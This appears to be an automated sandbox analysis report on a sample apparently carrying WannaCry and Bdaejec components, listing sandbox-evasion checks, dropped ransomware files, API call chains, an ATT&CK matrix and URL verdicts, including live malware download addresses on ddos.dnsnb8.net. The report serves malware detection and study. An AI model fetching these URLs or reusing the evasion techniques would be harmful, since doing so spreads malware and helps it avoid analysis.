Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Code function: 0_2_10004790

0_2_10004790

Found stalling execution ending in API Sleep call

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Stalling execution: Execution stalls by calling Sleep

graph_0-4441

Query firmware table information (likely to detect VMs)

Source: C:\Windows\System32\svchost.exe

System information queried: FirmwareTableInformation

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Window / User API: threadDelayed 5007
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Window / User API: threadDelayed 3445

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Dropped PE file which has not been started: C:\Users\user\Documents\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\u.wnry	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Dropped PE file which has not been started: C:\Users\user\Downloads\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Dropped PE file which has not been started: C:\Users\jones\AppData\Local\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Dropped PE file which has not been started: C:\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\taskse.exe	Jump to dropped file

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Evaded block: after key decision

graph_0-3856

Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_2-1054

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe TID: 5468	Thread sleep time: -35000s >= -30000s
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe TID: 5840	Thread sleep count: 5007 > 30
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe TID: 5840	Thread sleep time: -15021000s >= -30000s
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe TID: 2716	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe TID: 3624	Thread sleep time: -390000s >= -30000s
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe TID: 5840	Thread sleep count: 3445 > 30
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe TID: 5840	Thread sleep time: -10335000s >= -30000s

Source: C:\Windows\System32\dllhost.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\taskdl.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe

Code function: 2_2_00411718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00411754h

2_2_00411718

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_10002300 CloseHandle,SHGetFolderPathW,??2@YAPAXI@Z,??_U@YAPAXI@Z,swprintf,FindFirstFileW,??3@YAXPAX@Z,??3@YAXPAX@Z,wcscmp,wcscmp,wcscmp,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcscmp,wcscmp,wcscmp,wcsncpy,wcsncpy,wcsncpy,FindNextFileW,FindClose,_wcsnicmp,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,	0_2_10002300
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_10004A40 CloseHandle,SHGetFolderPathW,wcslen,SHGetFolderPathW,SHGetFolderPathW,wcslen,wcsrchr,wcschr,SHGetFolderPathW,wcslen,wcsrchr,swprintf,FindFirstFileW,wcscmp,wcscmp,swprintf,wcscmp,swprintf,FindNextFileW,FindClose,	0_2_10004A40
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Code function: 2_2_004129E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,	2_2_004129E2
Source: C:\Users\user\Desktop\taskdl.exe	Code function: 10_2_00401080 GetDriveTypeW,Sleep,swprintf,swprintf,FindFirstFileW,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,DeleteFileW,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,DeleteFileW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,	10_2_00401080

Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe

Code function: 2_2_00412B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

2_2_00412B8C

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Thread delayed: delay time: 30000

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\ClipSVC\Archive\Apps\~SDF32F.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\ClipSVC\~SD7E4B.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\~SD9453.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\ClipSVC\GenuineTicket\~SDF33F.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\ClipSVC\Archive\~SD7E4C.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Caches\~SD7E4A.tmp	Jump to behavior

Source: cscript.exe, 0000000F.00000002.1307848672.00000000031E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\e6w6
Source: svchost.exe, 00000026.00000002.3709091663.00000168A0332000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware-42 2 @
Source: cscript.exe, 0000000F.00000002.1307848672.00000000031E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000026.00000003.1435144072.00000168A0347000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: svchost.exe, 00000026.00000003.1435144072.00000168A0347000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware Virtual disk 2.0 6000c298128b8c02a71a2474aeb5f3dc$
Source: svchost.exe, 00000026.00000003.1435144072.00000168A0347000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000SCSI\CdRomNECVMWarVMware_SATA_CD001.00SCSI\CdRomNECVMWarVMware_SATA_CD00SCSI\CdRomNECVMWarSCSI\NECVMWarVMware_SATA_CD001NECVMWarVMware_SATA_CD001GenCdRom
Source: svchost.exe, 00000026.00000003.1435144072.00000168A0347000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware20,1
Source: svchost.exe, 00000026.00000003.1435144072.00000168A0347000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
Source: wBQInv.exe, 00000002.00000003.1276194123.0000000000E80000.00000004.00000020.00020000.00000000.sdmp, wBQInv.exe, 00000002.00000002.1607845694.0000000000E80000.00000004.00000020.00020000.00000000.sdmp, wBQInv.exe, 00000002.00000002.1607845694.0000000000E16000.00000004.00000020.00020000.00000000.sdmp, wBQInv.exe, 00000002.00000002.1607845694.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000026.00000003.1435144072.00000168A0347000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
Source: svchost.exe, 00000026.00000003.1435144072.00000168A0347000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware
Source: svchost.exe, 00000026.00000003.1435144072.00000168A0347000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware SVGA IIES1371
Source: svchost.exe, 00000026.00000003.1435144072.00000168A0347000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM
Source: svchost.exe, 00000026.00000003.1435144072.00000168A0347000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
Source: svchost.exe, 00000026.00000003.1435144072.00000168A0347000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: svchost.exe, 00000026.00000003.1435144072.00000168A0347000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: svchost.exe, 00000026.00000003.1435144072.00000168A0347000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000SCSI\DiskVMware__Virtual_disk____2.0_SCSI\DiskVMware__Virtual_disk____SCSI\DiskVMware__SCSI\VMware__Virtual_disk____2VMware__Virtual_disk____2GenDisk

Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe

API call chain: ExitProcess graph end node

graph_2-1029

Source: C:\Windows\System32\svchost.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Code function: 0_2_00401A45 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00401A45

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Code function: 0_2_0075A044 mov eax, dword ptr fs:[00000030h]

0_2_0075A044

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Code function: 0_2_004021E9 strrchr,SetLastError,GetModuleHandleA,GetNativeSystemInfo,GetProcessHeap,HeapAlloc,memcpy,SetLastError,

0_2_004021E9

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbs
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 6768 -ip 6768
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 916

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Code function: 0_2_10001360 time,AllocateAndInitializeSid,time,CheckTokenMembership,FreeSid,

0_2_10001360

Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformation
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformation
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformation
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformation
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformation
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformation
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformation
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat VolumeInformation
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm VolumeInformation
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat VolumeInformation
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat VolumeInformation
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformation
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformation
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformation
Source: C:\Windows\SysWOW64\cscript.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe

Code function: 2_2_00411718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv,

2_2_00411718

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Code function: 0_2_100053F0 GetUserNameW,_wcsicmp,

0_2_100053F0

Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe

Code function: 2_2_0041139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,

2_2_0041139F

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: wBQInv.exe, 00000002.00000003.1276194123.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: C:\Program Files\Windows Defender\MsMpEng.exe

Stealing of Sensitive Information

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: wBQInv.exe PID: 6768, type: MEMORYSTR

Remote Access Functionality

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: wBQInv.exe PID: 6768, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	12 Scripting	Valid Accounts	31 Native API	12 Scripting	1 DLL Side-Loading	2 Obfuscated Files or Information	OS Credential Dumping	11 System Time Discovery	1 Taint Shared Content	11 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	21 Data Encrypted for Impact
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 Access Token Manipulation	12 Software Packing	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	Data from Removable Media	2 Encrypted Channel	Exfiltration Over Bluetooth	1 Defacement
Email Addresses	DNS Server	Domain Accounts	2 Service Execution	2 Windows Service	2 Windows Service	1 DLL Side-Loading	Security Account Manager	4 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Registry Run Keys / Startup Folder	11 Process Injection	1 File Deletion	NTDS	25 System Information Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	1 Services File Permissions Weakness	1 Registry Run Keys / Startup Folder	11 Masquerading	LSA Secrets	231 Security Software Discovery	SSH	Keylogging	12 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Services File Permissions Weakness	121 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Process Discovery	VNC	GUI Input Capture	1 Proxy	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	121 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Hidden Files and Directories	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Services File Permissions Weakness	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	100%	Avira	W32/Jadtre.B
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\@WanaDecryptor@.exe	100%	Avira	TR/FileCoder.724645
C:\@WanaDecryptor@.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://ddos.dnsnb8.net:799/cj//k3.rar	100%	URL Reputation	malware
https://web.archive.org/web/20100324014747/http://blindsignals.com/index.php/2009/07/jquery-delay/	0%	URL Reputation	safe
https://html.spec.whatwg.org/#strip-and-collapse-whitespace	0%	URL Reputation	safe
http://ddos.dnsnb8.net:799/cj//k2.rar	100%	URL Reputation	malware
https://promisesaplus.com/#point-75	0%	URL Reputation	safe
https://web.archive.org/web/20141116233347/http://fluidproject.org/blog/2008/01/09/getting-setting-a	0%	URL Reputation	safe
https://bugs.webkit.org/show_bug.cgi?id=29084	0%	URL Reputation	safe
https://bugs.chromium.org/p/chromium/issues/detail?id=378607	0%	URL Reputation	safe
https://bugzilla.mozilla.org/show_bug.cgi?id=687787	0%	URL Reputation	safe
http://ddos.dnsnb8.net:799/cj//k1.rar	100%	URL Reputation	malware
https://bugs.chromium.org/p/chromium/issues/detail?id=470258	0%	URL Reputation	safe
https://promisesaplus.com/#point-64	0%	URL Reputation	safe
https://promisesaplus.com/#point-61	0%	URL Reputation	safe
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=	0%	Avira URL Cloud	safe
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx	0%	Avira URL Cloud	safe
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/	0%	Avira URL Cloud	safe
https://dev.ditu.live.com/REST/v1/Routes/	0%	Avira URL Cloud	safe
http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k3.rar-	100%	Avira URL Cloud	malware
https://dev.virtualearth.net/REST/v1/Routes/Walking	0%	Avira URL Cloud	safe
https://dev.ditu.live.com/mapcontrol/logging.ashx	0%	Avira URL Cloud	safe
https://dev.virtualearth.net/REST/v1/Routes/Driving	0%	Avira URL Cloud	safe
http://www.w3.	0%	Avira URL Cloud	safe
https://drafts.csswg.org/cssom/#resolved-values	0%	URL Reputation	safe
https://bugs.chromium.org/p/chromium/issues/detail?id=589347	0%	URL Reputation	safe
https://bugzilla.mozilla.org/show_bug.cgi?id=649285	0%	URL Reputation	safe
https://html.spec.whatwg.org/multipage/syntax.html#attributes-2	0%	URL Reputation	safe
https://promisesaplus.com/#point-59	0%	URL Reputation	safe
https://jsperf.com/getall-vs-sizzle/2	0%	URL Reputation	safe
https://promisesaplus.com/#point-57	0%	URL Reputation	safe
https://www.google.com/search?q=how	0%	Avira URL Cloud	safe
https://github.com/jquery/jquery/pull/557)	0%	Avira URL Cloud	safe
https://github.com/jrburke/requirejs/wiki/Updating-existing-libraries#wiki-anon	0%	Avira URL Cloud	safe
https://dev.virtualearth.net/REST/v1/Transit/Schedules/	0%	Avira URL Cloud	safe
http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how	0%	Avira URL Cloud	safe
https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zipP	0%	Avira URL Cloud	safe
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/	0%	Avira URL Cloud	safe
https://dev.virtualearth.net/REST/v1/Imagery/Copyright/	0%	Avira URL Cloud	safe
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx	0%	Avira URL Cloud	safe
http://www.bingmapsportal.com	0%	Avira URL Cloud	safe
http://schemas.micr	0%	URL Reputation	safe
https://promisesaplus.com/#point-54	0%	URL Reputation	safe
https://developer.mozilla.org/en-US/docs/CSS/display	0%	URL Reputation	safe
https://bugs.webkit.org/show_bug.cgi?id=137337	0%	URL Reputation	safe
https://promisesaplus.com/#point-48	0%	URL Reputation	safe
https://bugzilla.mozilla.org/show_bug.cgi?id=491668	0%	URL Reputation	safe
https://dev.virtualearth.net/REST/v1/Routes/	0%	Avira URL Cloud	safe
https://bugs.chromium.org/p/chromium/issues/detail?id=449857	0%	URL Reputation	safe
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k3.rar_	100%	Avira URL Cloud	malware
https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=	0%	Avira URL Cloud	safe
https://dev.virtualearth.net/REST/v1/Traffic/Incidents/	0%	Avira URL Cloud	safe
https://dev.ditu.live.com/REST/v1/Transit/Stops/	0%	Avira URL Cloud	safe
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?	0%	Avira URL Cloud	safe
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=	0%	Avira URL Cloud	safe
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=	0%	Avira URL Cloud	safe
https://github.com/eslint/eslint/issues/3229	0%	Avira URL Cloud	safe
https://dev.virtualearth.net/REST/v1/Locations	0%	Avira URL Cloud	safe
